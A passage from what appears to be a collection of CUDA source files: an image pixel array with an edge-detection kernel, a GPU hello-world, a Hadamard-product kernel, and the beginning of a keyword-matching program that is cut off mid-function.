0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,255,255,0,0,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,0,255,255,255,255,255,255,255,0,0,0, 0,0,0,0,0,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,0,0,0, 0,255,255,255,255,255,255,0,255,255,0,0,0,0,255,255,255,255,255, 0,0,0,0,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255, 255,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,255,255,255,255,255,255,0,0,0,0,255,255,255,255,255,255,255,255, 0,0,0,0,0,0,0,0,0,255,255,255,0,255,0,0,0,0,0, 255,255,255,255,0,0,0,0,0,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,255,255,255,255,0,0,0,0,0,0,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255, 0,0,0,0,0,255,255,255,0,0,0,0,0,0,255,255,255,0,0, 0,0,0,0,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,255,0,0,0, 0,0,0,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,255,0,0,0,0,0,255,255,0,0,0,0,0,0,255, 255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255, 255,255,0,0,0,0,0,0,255,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,255,0,255,0,0,0,0,0,0,255,0,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,0,255,0,0,0,0,0,0,0,0,255,255,255,0,0, 0,0,0,255,255,255,255,0,0,0,0,0,0,0,255,0,0,0,0, 0,0,0,0,0,0,0,0,255,255,255,255,255,0,0,0,0,0,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,255,0,0,0, 0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,0,0,255,0,0,0,0,0,0,0,0, 255,255,255,0,0,0,0,0,255,255,255,255,255,0,0,0,0,0,0, 255,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255, 255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,0,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 255,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0,255, 255,255,255,255,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255,255, 255,255,255,0,0,0,0,0,0,255,255,255,0,0,0,0,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,0,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0, 255,255,255,255,255,255,255,255,255,0,0,0,0,0,255,0,0,0,0, 0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,0,0,0,0,0,0,255,255,255,0,0,0,0,0,0, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,255, 0,0,0,0,0,255,255,255,255,255,255,255,255,255,0,0,0,0,0, 0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,255,255,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255, 0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,255,0, 0,0,0,0,0,0,255,0,0,0,0,0,255,255,255,0,0,0,0, 0,0,0,0,0,0,0,0,0,255,255,255,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,0,0,0,0,0,255,255,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,0,0, 0,0,0,255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,255, 255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,0,0,0,0, 0,255,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,255,255,0,0,0,0,0,0,255,255,0, 0,0,0,0,255,255,255,255,0,0,0,0,0,0,0,0,0,255,255, 255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255, 255,255,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,0,0,0,0,0,255,255,0,0,0,0, 0,255,255,255,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,0,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255,255,255, 255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255, 255,255,255,255,255,255,255,0,255,255,255,255,255,255,255,255,255,255,255, 255,255,255,255,0,0,255,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255, 255,255,255,255,255,255,255,255,0,255,255,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 }; __global__ void detect_edges(unsigned char *input, unsigned char *output) { int i = (blockIdx.x * 72) + threadIdx.x; int x, y; // the pixel of interest int b, d, f, h; // the pixels adjacent to x,y used for the calculation int r; // the result of calculate y = i / width;; x = i - (width * y); if (x == 0 || y == 0 || x == width - 1 || y == height - 1) { output[i] = 0; } else { b = i + width; d = i - 1; f = i + 1; h = i - width; r = (input[i] * 4) + (input[b] * -1) + (input[d] * -1) + (input[f] * -1) + (input[h] * -1); if (r >= 0) { output[i] = 255; } else { output[i] = 0; } } }
21,463
#include<iostream> using namespace std; __global__ void print() { printf("hello from gpu thread %d\n",threadIdx.x); } int main() { printf("hello from cpu \n"); print<<<1,10>>>(); }
21,464
#include "includes.h" __global__ void kernel_hadamard_fl(int N, float *wt, float *x){ unsigned int tid = blockIdx.x*blockDim.x + threadIdx.x; /* make sure to use only M threads */ if (tid<N) { x[tid]*=wt[tid]; } }
21,465
#include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <ctime> // Includes CUDA #include <cuda_runtime.h> #define LINEWIDTH 20 #define NWORDS 32 #define N_STREAMS 8 #define BLOCK_SIZE 32 #define TITLE_SIZE 1 int length; int len; int nwords; int matches[NWORDS]; char *ctext; char keywords[NWORDS][LINEWIDTH]; unsigned int *text; unsigned int *words; float cpuRunTime; // citation: https://stackoverflow.com/questions/14038589/what-is-the-canonical-way-to-check-for-errors-using-the-cuda-runtime-api #define checkCudaErrors(ans) { gpuAssert((ans), __FILE__, __LINE__); } inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true) { if (code != cudaSuccess) { fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line); if (abort) exit(code); } } void intialise(char *input) { nwords = NWORDS; printf("-----------\nGoint to read %s\n", input); char *line; line = (char*) malloc(sizeof(char)*LINEWIDTH); memset(matches, 0, sizeof(matches)); // read in text and keywords for processing FILE *fp, *wfile; wfile = fopen("./data/keywords.txt","r"); if (!wfile) { printf("keywords.txt: File not found.\n"); exit(0);} int k=0, cnt = nwords; size_t read, linelen = LINEWIDTH; while((read = getline(&line, &linelen, wfile)) != -1 && cnt--) { strncpy(keywords[k], line, sizeof(line)); keywords[k][4] = '\0'; k++; } fclose(wfile); fp = fopen(input,"r"); if (!fp) { 